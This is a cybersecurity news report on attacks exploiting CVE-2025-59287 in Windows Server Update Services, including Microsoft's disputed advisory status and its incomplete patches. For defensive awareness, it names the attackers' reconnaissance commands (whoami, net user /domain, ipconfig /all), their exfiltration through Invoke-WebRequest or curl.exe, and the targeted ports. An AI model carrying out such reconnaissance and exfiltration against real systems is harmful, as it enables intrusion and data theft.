Microsoft Refuses to Mark Critical WSUS Flaw as Actively Exploited
Cyberthreat analysts are reporting active exploitation of a critical vulnerability in Windows Server Update Services (WSUS), identified as CVE-2025-59287. Merely days after Microsoft released an emergency patch and CISA added the flaw to its Known Exploited Vulnerabilities (KEV) catalog, researchers have already observed large-scale attacks leveraging it.
Despite mounting evidence of actual compromises, Microsoft has yet to update the advisory status for CVE-2025-59287, which still lists the flaw as not under active exploitation. The company merely describes the likelihood of attacks as “more likely,” even as multiple independent sources confirm that exploitation is already in full swing.
The Google Threat Intelligence Group (GTIG) has verified that the vulnerability is being exploited in an ongoing campaign attributed to a new threat actor tracked as UNC6512. Upon gaining access, the attackers execute reconnaissance commands to survey affected systems and infrastructure, subsequently exfiltrating data from compromised servers.
The vulnerability affects Windows Server 2012 through 2025 and stems from unsafe deserialization of untrusted data, allowing for arbitrary code execution without authentication. Systems where the WSUS role is not enabled remain unaffected.
The first patch addressing the issue was released on October 8 as part of Microsoft’s regular update cycle, but it proved incomplete. A week later, Microsoft issued an out-of-band fix, yet a surge of attacks followed almost immediately. According to Trend Micro, over 100,000 exploitation attempts have been recorded in the past week. The Zero Day Initiative (ZDI) reports that nearly 500,000 WSUS servers remain exposed online, with attackers targeting vulnerable instances indiscriminately across industries and regions.
Researchers at Unit 42 observed that the attacks primarily target publicly accessible WSUS servers using default ports 8530 (HTTP) and 8531 (HTTPS). Once inside, adversaries deploy PowerShell commands for network reconnaissance — including whoami, net user /domain, and ipconfig /all — before exfiltrating data via Invoke-WebRequest or curl.exe to remote servers.
While Unit 42 notes that current activity remains limited to reconnaissance, the potential consequences are severe: a compromised WSUS instance could be weaponized to distribute malware through legitimate update channels across an organization’s entire infrastructure. Given the low complexity of exploitation and the availability of a public proof-of-concept (PoC) since October 21, the vulnerability poses an imminent risk of mass attacks.
Several experts have also pointed out that Microsoft’s recurring issues with incomplete patches have once again come to light. The ZDI reminded that similar cases had occurred with SharePoint, urging Microsoft to improve the quality and completeness of its fixes, as partial patches can create a false sense of security among enterprise customers.
Support Our Threat Intelligence
If you find our technology report and cybersecurity news helpful, consider supporting our work.
Buy Me a Coffee
PayPal
